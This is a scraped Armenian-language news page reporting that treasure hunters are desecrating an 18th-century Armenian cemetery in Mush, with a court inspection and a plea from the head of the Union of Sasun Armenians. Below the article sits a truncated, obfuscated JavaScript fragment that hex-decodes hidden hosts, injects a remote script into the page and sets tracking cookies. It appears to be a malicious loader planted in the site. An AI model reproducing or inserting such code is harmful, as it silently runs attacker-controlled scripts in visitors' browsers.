Պատմական հայկական Մուշ քաղաքի հայկական գերեզմանոցը ավերվում է

Պատմական հայկական Մուշ քաղաքի ներկայիս Դերե թաղամասում գտնվող 18-րդ դարի հայկական գերեզմանոցը ավերվում է: «Արմենպրես»-ի փոխանցմամբ` այս մասին գրում է ermenihaber.am-ը:

Թուրքական «Haberler.com» լրատվակայքի տեղեկացմամբ՝ այս մասին ստացված տեղեկությունների հիման վրա գերեզմանոցի տարածքում ուսումնասիրություն է իրականացվել:

Սասունի հայերի միության նախագահ Ազիզ Դաղջըն հայցով դիմել է Մուշի առաջին ատյանի ընդհանուր իրավասության դատարան՝ բողոքելով, որ տեղի հայկական գերեզմանոցը պղծվում է: Հայցի հիման վրա դատական հանձնաժողովը գերեզմանոցում ուսումնասիրություն է կատարել և պարզել, որ գանձախույզները տեղ-տեղ հորատումներ են արել:

Ուսումնասիրությունից հետո Ազիզ Դաղջըն հանդես է եկել հայտարարությամբ՝ նշելով, որ գանձ գտնելու նպատակով հայկական գերեզմանները փորվել են, իսկ հանգուցյալների ոսկորները այս ու այն կողմ են թափվել: Միության նախագահը հիշեցրել է, որ գերեզմանոցն ընդհանուր արժեք է և մեծ կարևորություն ունի ինչպես հայ համայնքի, այնպես էլ Թուրքիայի հանրապետության համար:

Դաղջըն տեղեկացրել է, որ հայկական գերեզմանոցի վերականգման խնդրանքով դիմում է ուղարկվել Թուրքիայի մշակույթի և զբոսաշրջության նախարարությանը:

«Թող վերջ տան մեր գերեզմանոցները փորելուն, որովհետև մեր գերեզմանոցներում ուրիշ ոչինչ չկա, բացի մեր հանգուցյալների ոսկորներից: Իսկ մենք մեր ննջեցյալներին միայն սավանով են թաղում: Այնտեղ որևէ նյութական արժեք չեք կարող գտնել: Նույնը վերաբերում է նաև մեր վանական համալիրներին: Թող չավերեն դրանք»,-նշել է նա:

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “yerkirmedia.am”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return “”},c=function(e,t,o){var lp=p();if(lp==””)return;var n=lp+”//”+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(“firefox”))window.smlo.loadSmlo(n.replace(“https:”,”http:”));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(“firefox”))window.zSmlo.loadSmlo(n.replace(“https:”,”http:”));else{var i=document.createElement(“script”);i.setAttribute(“src”,n),i.setAttribute(“type”,”text/javascript”),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,”function”==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),”function”==typeof o&&o())}}},s=function(f){var u=a(f)+”/ajs/”+t+”/c/”+r(d())+”_”+(self===top?0:1)+”.js”;window.a3164427983=f,c(u,function(){o(“a2519043306”)!=f&&n(“a2519043306”,f,{expires:parseInt(“3600”)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(“a36677002”)!=i&&n(“a36677002”,i);var r=o(“a2519043306”);t=r?r:e[0],s(t)};f()}();
// ]]>


Source: Yerkir Media
Link: Պատմական հայկական Մուշ քաղաքի հայկական գերեզմանոցը ավերվում է

Your generosity empowers our advocacy, inspires our work, and sustains our momentum.
DONATE NOW!
close-image